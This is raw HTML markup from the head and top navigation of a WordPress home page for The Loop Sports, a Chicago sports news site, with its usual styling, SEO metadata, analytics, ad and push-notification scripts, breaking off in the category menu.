h2.entry-title, .wf-active .section-three-column-one .entry-header h2.entry-title{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active #front-section-fourcolumn .type-post .entry-header h2.entry-title, .wf-active .recommended-posts-wrap #jp-relatedposts .jp-relatedposts-items-visual h4.jp-relatedposts-post-title{font-style:normal;font-weight:400}}</style> <!-- This site is optimized with the Yoast SEO plugin v11.2.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Chicago Sports News and Opinion"/> <link rel="canonical" href="https://theloopsports.com/" /> <link rel="next" href="https://theloopsports.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="The Loop Sports - Chicago Sports News and Opinion" /> <meta property="og:description" content="Chicago Sports News and Opinion" /> <meta property="og:url" content="https://theloopsports.com/" /> <meta property="og:site_name" content="The Loop Sports" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Chicago Sports News and Opinion" /> <meta name="twitter:title" content="The Loop Sports - Chicago Sports News and Opinion" /> <meta name="twitter:site" content="@TheLoop_Sports" /> <meta name="google-site-verification" content="gG8WDX5zYusmyuU8JIav36RLN2xKpzDJsyh0fyCC5Y8" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://theloopsports.com/#organization","name":"The Loop Sports","url":"https://theloopsports.com/","sameAs":["https://www.facebook.com/TheLoopSports/","https://instagram.com/theloopsports?utm_source=ig_profile_share&igshid=b5czlggvh9cn","https://www.linkedin.com/company/the-loop-media-group-llc/about/","https://www.youtube.com/channel/UCxnf9v4xYafkQ6VZELpOLlQ","https://twitter.com/TheLoop_Sports"]},{"@type":"WebSite","@id":"https://theloopsports.com/#website","url":"https://theloopsports.com/","name":"The Loop Sports","publisher":{"@id":"https://theloopsports.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://theloopsports.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://theloopsports.com/#webpage","url":"https://theloopsports.com/","inLanguage":"en-US","name":"The Loop Sports - Chicago Sports News and Opinion","isPartOf":{"@id":"https://theloopsports.com/#website"},"about":{"@id":"https://theloopsports.com/#organization"},"description":"Chicago Sports News and Opinion"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="The Loop Sports &raquo; Feed" href="https://theloopsports.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="The Loop Sports &raquo; Comments Feed" href="https://theloopsports.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/theloopsports.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' /> <link crossorigin="anonymous" rel='stylesheet' id='nikau-fonts-css' href='https://fonts.googleapis.com/css?family=Noticia+Text%3A400%2C400italic%2C700%2C700italic%7CKanit%3A400%2C500%2C600%2C700&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='nikau-style-css' href='https://theloopsports.com/wp-content/themes/nikau/style.css?ver=20160507' type='text/css' media='all' /> <link rel='stylesheet' id='genericons-css' href='https://c0.wp.com/p/jetpack/7.3.1/_inc/genericons/genericons/genericons.css' type='text/css' media='all' /> <link rel='stylesheet' id='slick-style-css' href='https://theloopsports.com/wp-content/themes/nikau/js/slick/slick.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.3.1/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/jquery.spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/tiled-gallery/tiled-gallery/tiled-gallery.min.js'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/mediaelement-and-player.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/mediaelement-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <script type='text/javascript' src='https://theloopsports.com/wp-content/themes/nikau/js/slick/slick.js?ver=1.6.0'></script> <script type='text/javascript' src='https://theloopsports.com/wp-content/themes/nikau/js/jquery.viewportchecker.js?ver=1.8.7'></script> <script type='text/javascript' src='https://theloopsports.com/wp-content/themes/nikau/js/sticky-kit.js?ver=1.1.3'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/postmessage.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/jquery.jetpack-resize.min.js'></script> <link rel='https://api.w.org/' href='https://theloopsports.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://theloopsports.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://theloopsports.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://wp.me/8cbM3' /> <meta property="fb:pages" content="378148812526676" /> <meta property="ia:markup_url" content="https://theloopsports.com/2019/05/14/bulls-draw-number-seven-at-draft-lottery/?ia_markup=1" /> <link rel='dns-prefetch' href='//widgets.wp.com'/> <link rel='dns-prefetch' href='//s0.wp.com'/> <link rel='dns-prefetch' href='//0.gravatar.com'/> <link rel='dns-prefetch' href='//1.gravatar.com'/> <link rel='dns-prefetch' href='//2.gravatar.com'/> <link rel='dns-prefetch' href='//jetpack.wordpress.com'/> <link rel='dns-prefetch' href='//s1.wp.com'/> <link rel='dns-prefetch' href='//s2.wp.com'/> <link rel='dns-prefetch' href='//public-api.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//c0.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style> <style type="text/css"> #front-section-threecolumn .entry-summary {display: block;} #front-section-fourcolumn .entry-summary {display: block;} </style> <meta name="onesignal" content="wordpress-plugin"/> <link rel="manifest" href="https://theloopsports.com/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/manifest.json.php?gcm_sender_id="/> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script> <script> window.OneSignal = window.OneSignal || []; OneSignal.push( function() { OneSignal.SERVICE_WORKER_UPDATER_PATH = "OneSignalSDKUpdaterWorker.js.php"; OneSignal.SERVICE_WORKER_PATH = "OneSignalSDKWorker.js.php"; OneSignal.SERVICE_WORKER_PARAM = { scope: '/' }; OneSignal.setDefaultNotificationUrl("https://theloopsports.com"); var oneSignal_options = {}; window._oneSignalInitOptions = oneSignal_options; oneSignal_options['wordpress'] = true; oneSignal_options['appId'] = '5fa7ae7e-b8e2-43bc-8911-45d03bbc8d75'; oneSignal_options['autoRegister'] = true; oneSignal_options['welcomeNotification'] = { }; oneSignal_options['welcomeNotification']['title'] = ""; oneSignal_options['welcomeNotification']['message'] = ""; oneSignal_options['path'] = "https://theloopsports.com/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/"; oneSignal_options['promptOptions'] = { }; oneSignal_options['notifyButton'] = { }; oneSignal_options['notifyButton']['enable'] = true; oneSignal_options['notifyButton']['position'] = 'bottom-right'; oneSignal_options['notifyButton']['theme'] = 'default'; oneSignal_options['notifyButton']['size'] = 'large'; oneSignal_options['notifyButton']['prenotify'] = true; oneSignal_options['notifyButton']['showCredit'] = true; oneSignal_options['notifyButton']['text'] = {}; OneSignal.init(window._oneSignalInitOptions); }); function documentInitOneSignal() { var oneSignal_elements = document.getElementsByClassName("OneSignal-prompt"); var oneSignalLinkClickHandler = function(event) { OneSignal.push(['registerForPushNotifications']); event.preventDefault(); }; for(var i = 0; i < oneSignal_elements.length; i++) oneSignal_elements[i].addEventListener('click', oneSignalLinkClickHandler, false); } if (document.readyState === 'complete') { documentInitOneSignal(); } else { window.addEventListener("load", function(event){ documentInitOneSignal(); }); } </script> <style type="text/css" id="nikau-header-css"> h1.site-title, p.site-title, p.site-description { position: absolute; clip: rect(1px, 1px, 1px, 1px); } </style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #ffffff; } </style> <style type="text/css" id="custom-colors-css">pre{color:#939393}body,input,textarea,input[type="button"],input[type="submit"],input#submit,img.img-border-thin,#site-branding,.close-btn-wrap,.format-video .entry-thumbnail a:before,.sticky-header{background-color:#fff}pre,#front-section-three,.widget-area .widget_blog_subscription,.inner-offcanvas-wrap{background-color:#f2f2f2}.mobile-search{background-color:#e0e0e0}#colophon,input[type="submit"]:hover,input#submit:hover,#primary #infinite-handle span:hover,#front-section-three a.all-posts-link:hover,.desktop-search input[type="submit"]:hover,.widget_search input[type="submit"]:hover,.post-password-form input[type="submit"]:hover .footer-feature-btn:hover,#offcanvas-widgets-open:hover,.offcanvas-widgets-show #offcanvas-widgets-open,#secondary .widget_blog_subscription input[type="submit"],#colophon a,.blog #primary .hentry.has-post-thumbnail:nth-child(4n+1) .entry-cats a,.section-one-column-one .entry-cats a,.section-three-column-one .entry-cats a,#front-section-four .entry-cats a,#front-section-four .entry-header h2.entry-title a,#front-section-four .entry-meta,#front-section-four .entry-meta a,.single-post .entry-cats a,#primary #infinite-handle span:hover button,.featured-slider .entry-cats a,.section-one-column-one .entry-cats a,.section-three-column-one .entry-cats a,#front-section-four .entry-cats a,.single-post .entry-cats a,.single-post .sd-social-icon .sd-content ul li a.sd-button:hover,.page .sd-social-icon .sd-content ul li a.sd-button:hover,a.standard-btn,.post .entry-content a.standard-btn,.page .entry-content a.standard-btn,.post .entry-content a.standard-btn:hover,.page .entry-content a.standard-btn:hover,.desktop-search input[type="submit"],#desktop-navigation ul ul.sub-menu,#desktop-navigation ul ul.children,#desktop-navigation .sub-menu li a,#desktop-navigation .children li a,#colophon #site-info,#colophon #site-info a,#colophon .jetpack-social-navigation a,#colophon .widget,#colophon .widget a,#colophon .widget a:hover,#colophon #site-info a:hover,#colophon .widget h3,#colophon .jetpack-social-navigation a:hover,#secondary .widget_blog_subscription p,#sidebar-offcanvas .widget_blog_subscription p,#desktop-navigation ul ul li.menu-item-has-children a:hover,#desktop-navigation ul ul li.menu-item-has-children a:focus,#secondary .widget_blog_subscription input[type="submit"],#secondary .widget_blog_subscription input[type="submit"]:hover,#secondary .widget_blog_subscription input[type="submit"]:focus,.footer-widgetarea .widget_blog_subscription input[type="submit"],.footer-widgetarea .widget_blog_subscription input[type="submit"]:hover,.footer-widgetarea .widget_blog_subscription input[type="submit"]:focus,#sidebar-offcanvas .widget_blog_subscription input[type="submit"],#sidebar-offcanvas .widget_blog_subscription input[type="submit"]:hover,#sidebar-offcanvas .widget_blog_subscription input[type="submit"]:focus,.footer-widgetarea .widget_search input[type="submit"],.footer-widgetarea .widget_search input[type="submit"]:hover,.footer-widgetarea .widget_search input[type="submit"]:focus{color:#fff}.desktop-search input[type="submit"]{color:#fff}.desktop-search input.search-field,.desktop-search input[type="submit"]{border-color:#fff}body,.format-video .entry-thumbnail a:before,#desktop-navigation ul ul.sub-menu:before,#desktop-navigation ul ul.children:before{color:#1a1a1a}.single-post .entry-header .intro p,.entry-meta,.entry-cats,.entry-summary,.front-section-title,.social-front-title,.widget_blog_subscription #subscribe-blog p,.section-about-column-one p,a,.entry-header h2.entry-title,.entry-header h2.entry-title a,#secondary h2.widget-title,#sidebar-page h2.widget-title,.entry-meta a,.entry-cats a,a.more-link:hover::before,input,textarea,.blog .entry-cats a:nth-child(n+2):before,.search-results .entry-cats a:nth-child(n+2):before,.archive .entry-cats a:nth-child(n+2):before,.pagination,.pagination a,.widget h2.widget-title,#primary #infinite-handle span{color:#1a1a1a}::-webkit-input-placeholder{color:#1a1a1a}:-moz-placeholder{color:#1a1a1a}::-moz-placeholder{color:#1a1a1a}:-ms-input-placeholder{color:#1a1a1a}#comments .comment-reply a,#respond a#cancel-comment-reply-link,#comments #respond p.comment-notes a,#comments #respond p.logged-in-as a,#nav-comments a,#comments .comment-meta,#comments .comment-meta a,.single-post .entry-tags a,p.wp-caption-text,.contact-form label span,.gallery .gallery-item .gallery-caption,.pagination .nav-links .current{color:#1a1a1a}#colophon,#desktop-navigation ul ul.sub-menu,#desktop-navigation ul ul.children{background-color:#1a1a1a}a.standard-btn{background-color:#1a1a1a}.widget_search input[type="submit"],.post-password-form input[type="submit"],.front-section-title,.social-front-title,.front-section .type-post,#front-section-three h3.front-section-title:before,.section-about-column-one .front-section-title,.section-about-column-two .jetpack-social-navigation ul,.section-about-column-two .jetpack-social-navigation ul li,.blog-wrap h3.blog-title,.archive-header h1.archive-title,#primary .hentry,.single-post .hentry .entry-meta,.single-attachment .entry-meta,.single-post .authorbox,#comments h2.comments-title,.page-template-default #primary .hentry,.page-fullwidth #primary .hentry,.page-template-no-sidebar #primary .hentry,.error404 #primary .page,.page h1.entry-title,.widget-area .widget,.recommended-posts-wrap #jp-relatedposts h3.jp-relatedposts-headline,.recommended-posts-wrap #jp-relatedposts .jp-relatedposts-items-visual .jp-relatedposts-post,.widget-area .widget_blog_subscription,#overlay-nav,#overlay-nav ul li,#overlay-nav ul ul.sub-menu,#overlay-nav ul ul.children{border-color:#1a1a1a}#desktop-navigation ul li.menu-item-has-children a:after,#desktop-navigation ul li.page_item_has_children a:after{border-top-color:#1a1a1a}abbr,acronym,.single-post .entry-content blockquote,.page .entry-content blockquote,textarea:focus,textarea:active,input:focus,input:active,input[type="button"],input[type="submit"],input#submit,#offcanvas-widgets-open,#front-section-three a.all-posts-link,.pagination,.single-post .post-navigation a,.single-attachment .post-navigation a,#primary #infinite-handle span{border-color:#1a1a1a}table,table td,table th,#site-branding,#overlay-nav ul li,.inner-offcanvas-wrap .jetpack-social-navigation,.close-btn-wrap,.mobile-search,.slider-on.slider-boxed #masthead,.headerimg-on.header-boxed #masthead,#masthead,.desktop-search,input,textarea{border-color:#1a1a1a}.entry-content a:hover,.comment-text a:hover,.author-bio a:hover{color:#6d6d6d}.entry-content a,.comment-text a,#desktop-navigation ul li a:hover,.front-section a.all-posts-link:hover,#overlay-close:hover,.widget-area .widget ul li a:hover,#sidebar-offcanvas .widget a:hover,.textwidget a:hover,#overlay-nav a:hover,.author-links a:hover,.single-post .post-navigation a:hover,.single-attachment .post-navigation a:hover,.author-bio a,.single-post .hentry .entry-meta a:hover,.entry-header a:hover,.entry-header h2.entry-title a:hover,.blog .entry-meta a:hover,a.more-link:hover,.pagination .nav-links a:hover,.widget_blog_subscription input[type="submit"]{color:#6d6d6d}.featured-slider button.slick-arrow:hover::after{color:#fff}.blog #primary .hentry.has-post-thumbnail:nth-child(4n+1) .entry-cats a:hover,.featured-slider .entry-cats a:hover,.section-one-column-one .entry-cats a:hover,.section-three-column-one .entry-cats a:hover,#front-section-four .entry-cats a:hover,.single-post .entry-cats a:hover,.footer-feature-btn:hover,#secondary .widget_blog_subscription input[type="submit"]:hover,input[type="submit"]:hover,input#submit:hover,#primary #infinite-handle span:hover,#front-section-three a.all-posts-link:hover,.desktop-search input[type="submit"]:hover,#offcanvas-widgets-open:hover,.offcanvas-widgets-show #offcanvas-widgets-open,#secondary .widget_blog_subscription input[type="submit"],.footer-widgetarea .widget_blog_subscription input[type="submit"],#sidebar-offcanvas .widget_blog_subscription input[type="submit"],.footer-widgetarea .widget_search input[type="submit"]{background-color:#6d6d6d}#secondary .widget_blog_subscription input[type="submit"]:hover,#secondary .widget_blog_subscription input[type="submit"]:focus,.footer-widgetarea .widget_blog_subscription input[type="submit"]:hover,.footer-widgetarea .widget_blog_subscription input[type="submit"]:focus,#sidebar-offcanvas .widget_blog_subscription input[type="submit"]:hover,#sidebar-offcanvas .widget_blog_subscription input[type="submit"]:focus,.footer-widgetarea .widget_search input[type="submit"]:hover,.footer-widgetarea .widget_search input[type="submit"]:focus{background-color:#424242}.featured-slider .entry-cats a,.section-one-column-one .entry-cats a,.section-three-column-one .entry-cats a,#front-section-four .entry-cats a,.single-post .entry-cats a,.blog #primary .hentry.has-post-thumbnail:nth-child(4n+1) .entry-cats a,#desktop-navigation .sub-menu li a:hover,#desktop-navigation .children li a:hover,#secondary .widget_blog_subscription input[type="submit"]{background-color:#6d6d6d}input[type="submit"]:hover,input#submit:hover,#primary #infinite-handle span:hover,#front-section-three a.all-posts-link:hover,.desktop-search input[type="submit"]:hover,.widget_search input[type="submit"]:hover,.post-password-form input[type="submit"]:hover .footer-feature-btn:hover,#offcanvas-widgets-open:hover,.offcanvas-widgets-show #offcanvas-widgets-open,#secondary .widget_blog_subscription input[type="submit"]{border-color:#6d6d6d}.single-post .post-navigation a:hover,.single-attachment .post-navigation a:hover,.desktop-search input.search-field:active,.desktop-search input.search-field:focus{border-color:#6d6d6d}#desktop-navigation ul li.menu-item-has-children a:hover::after{border-top-color:#fff}</style> <script type="text/javascript"> var __ATA_PP = { pt: 0, ht: 2, tn: 'nikau', amp: false, siteid: 121115887, consent: 0 }; var __ATA = __ATA || {}; __ATA.cmd = __ATA.cmd || []; __ATA.criteo = __ATA.criteo || {}; __ATA.criteo.cmd = __ATA.criteo.cmd || []; </script> <link rel='dns-prefetch' href='//s.pubmine.com' /> <link rel='dns-prefetch' href='//x.bidswitch.net' /> <link rel='dns-prefetch' href='//static.criteo.net' /> <link rel='dns-prefetch' href='//ib.adnxs.com' /> <link rel='dns-prefetch' href='//aax.amazon-adsystem.com' /> <link rel='dns-prefetch' href='//bidder.criteo.com' /> <link rel='dns-prefetch' href='//cas.criteo.com' /> <link rel='dns-prefetch' href='//gum.criteo.com' /> <link rel='dns-prefetch' href='//ads.pubmatic.com' /> <link rel='dns-prefetch' href='//gads.pubmatic.com' /> <link rel='dns-prefetch' href='//tpc.googlesyndication.com' /> <link rel='dns-prefetch' href='//ad.doubleclick.net' /> <link rel='dns-prefetch' href='//googleads.g.doubleclick.net' /> <link rel='dns-prefetch' href='//www.googletagservices.com' /> <script async type="text/javascript" src="//s.pubmine.com/head.js"></script><link rel="icon" href="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-1111111-1.jpg?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-1111111-1.jpg?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-1111111-1.jpg?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-1111111-1.jpg?fit=270%2C270&#038;ssl=1" /> <!-- BEGIN ExactMetrics v5.3.8 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-93369834-1', 'auto'); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> <div class="wpcnt wpcnt-header"> <div class="wpa"> <span class="wpa-about">Advertisements</span> <div class="u top"> <div style="padding-bottom:15px;width:728px;height:90px;"> <div id="atatags-1-5cdd694eebedb"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-1-5cdd694eebedb', { collapseEmpty: 'before', sectionId: '1211158872', location: 110, width: 728, height: 90 }); }); </script> </div> </div> </div> </div> </div></head> <body class="home blog custom-background wp-custom-logo has-thumb custom-logo-on slider-on offcanvas-widgets-off custom-colors"> <header id="masthead" class="site-header cf" role="banner"> <div class="site-header-content"> <div id="site-branding"> <h1 class="site-title"><a href="https://theloopsports.com/" rel="home">The Loop Sports</a></h1> <div class="custom-logo-wrap"> <a href="https://theloopsports.com/" class="custom-logo-link" rel="home"><img width="520" height="236" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?fit=520%2C236&amp;ssl=1" class="custom-logo" alt="The Loop Sports" srcset="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?w=520&amp;ssl=1 520w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?resize=150%2C68&amp;ssl=1 150w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?resize=300%2C136&amp;ssl=1 300w" sizes="(max-width: 520px) 100vw, 520px" data-attachment-id="43002" data-permalink="https://theloopsports.com/cropped-img_0256-jpg/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?fit=520%2C236&amp;ssl=1" data-orig-size="520,236" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="cropped-IMG_0256.jpg" data-image-description="&lt;p&gt;https://theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg&lt;/p&gt; " data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?fit=300%2C136&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?fit=520%2C236&amp;ssl=1" /></a> </div><!-- end .custom-logo-wrap --> <p class="site-description">Chicago Sports News and Opinion</p> <button id="overlay-open" class="overlay-open overlay-btn"><span>Menu</span></button> <nav class="jetpack-social-navigation jetpack-social-navigation-genericons" role="navigation" aria-label="Social Links Menu"> <div class="menu-social-media-container"><ul id="menu-social-media" class="menu"><li id="menu-item-15" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15"><a target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/TheLoopSports"><span class="screen-reader-text">Facebook</span></a></li> <li id="menu-item-17" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17"><a target="_blank" rel="noopener noreferrer" href="https://twitter.com/TheLoop_Sports"><span class="screen-reader-text">Twitter</span></a></li> <li id="menu-item-18" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18"><a href="https://www.instagram.com/theloopsports/"><span class="screen-reader-text">Instagram</span></a></li> </ul></div> </nav><!-- .jetpack-social-navigation --> </div><!-- end #site-branding --> <nav id="desktop-navigation" class="desktop-navigation cf" role="navigation"> <ul id="menu-categories" class="menu"><li id="menu-item-15448" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15448"><a href="https://theloopsports.com/category/bears/">Bears</a></li> <li id="menu-item-15449" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15449"><a href="https://theloopsports.com/category/blackhawks/">Blackhawks</a></li> <li id="menu-item-15450" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15450"><a href="https://theloopsports.com/category/bulls/">Bulls</a></li> <li 